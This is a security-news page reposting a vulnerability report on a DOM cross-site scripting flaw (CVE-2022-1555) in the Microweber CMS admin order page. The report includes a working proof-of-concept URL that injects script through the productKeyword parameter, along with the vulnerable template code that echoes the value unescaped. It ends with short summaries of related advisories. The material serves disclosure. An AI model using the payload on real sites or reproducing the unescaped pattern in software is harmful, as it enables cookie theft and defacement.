Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-1555: DOM XSS in microweber ver 1.2.15 in microweber

DOM XSS in microweber ver 1.2.15 in GitHub repository microweber/microweber prior to 1.2.16. inject arbitrary js code, deface website, steal cookie…

CVE
Open in Source
#xss#web#js#git#php#docker

Description

Hi there, on your latest version docker images 3463db62a01f, vulnerable to DOM XSS.

Proof of Concept

http://localhost/admin/order?filteringResults=true&id=1&isPaid=1&keyword=1&maxDate=01/01/1967&maxPrice=1&minDate=01/01/1967&minPrice=1&orderStatus=new&productId=the&productKeyword=the9958%22%0a%09%09%09%09});%0a%09%09%09});%0a%09%09alert(origin);%0a%09%09%09$(document).ready(function%20()%20{%0a%09%09%09%09var%20searchOrdersByProduct%20=%20new%20mw.autoComplete({%0a//

Impact

inject arbitrary js code, deface website, steal cookie…

Occurrences

order_filtering.blade.php L157

DOM code

$(document).ready(function () {
                var searchOrdersByProduct = new mw.autoComplete({
                    element: "#js-orders-search-by-products",
                    placeholder: "<?php if ($productKeyword) { echo $productKeyword; } else { _e("Search by products..."); }?>",
                    autoComplete:true,
                    ajaxConfig: {
                        method: 'get',
                        url: mw.settings.api_url + 'get_content_admin?get_extra_data=1&content_type=product&keyword=${val}'
                    },
                    map: {
                        value: 'id',
                        title: 'title',
                        image: 'picture'
                    }
                });
                $(searchOrdersByProduct).on("change", function (e, val) {
                    $(".js-orders-search-product").val(val[0].id).trigger('change')
                    $(".js-orders-search-product-keyword").val(val[0].title).trigger('change')
                });
            });

Related news

CVE-2022-29340: NULL Pointer Dereference still exists in gf_isom_parse_movie_boxes_internal · Issue #2163 · gpac/gpac

GPAC 2.1-DEV-rev87-g053aae8-master. has a Null Pointer Dereference vulnerability in gf_isom_parse_movie_boxes_internal due to improper return value handling of GF_SKIP_BOX, which causes a Denial of Service. This vulnerability was fixed in commit 37592ad.

GHSA-6346-5r4h-ff5x: Microweber vulnerable to cross-site scripting (XSS)

Microweber is a drag and drop website builder and a powerful next generation CMS. Microweber versions 1.2.15 and prior are vulnerable to cross-site scripting. This could lead to injection of arbitrary JaveScript code, defacement of a page, or stealing cookies. A patch is available on the `master` branch of Microweber's GitHub repository.

CVE-2022-29155: 9815 – Serious SQL injection vulnerability in back-sql

In OpenLDAP 2.x before 2.5.12 and 2.6.x before 2.6.2, a SQL injection vulnerability exists in the experimental back-sql backend to slapd, via a SQL statement within an LDAP query. This can occur during an LDAP search operation when the search filter is processed, due to a lack of proper escaping.

CVE-2021-42235: security: SQL Injection · osTicket/osTicket@e282910

SQL injection in osTicket before 1.14.8 and 1.15.4 login and password reset process allows attackers to access the osTicket administration profile functionality.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE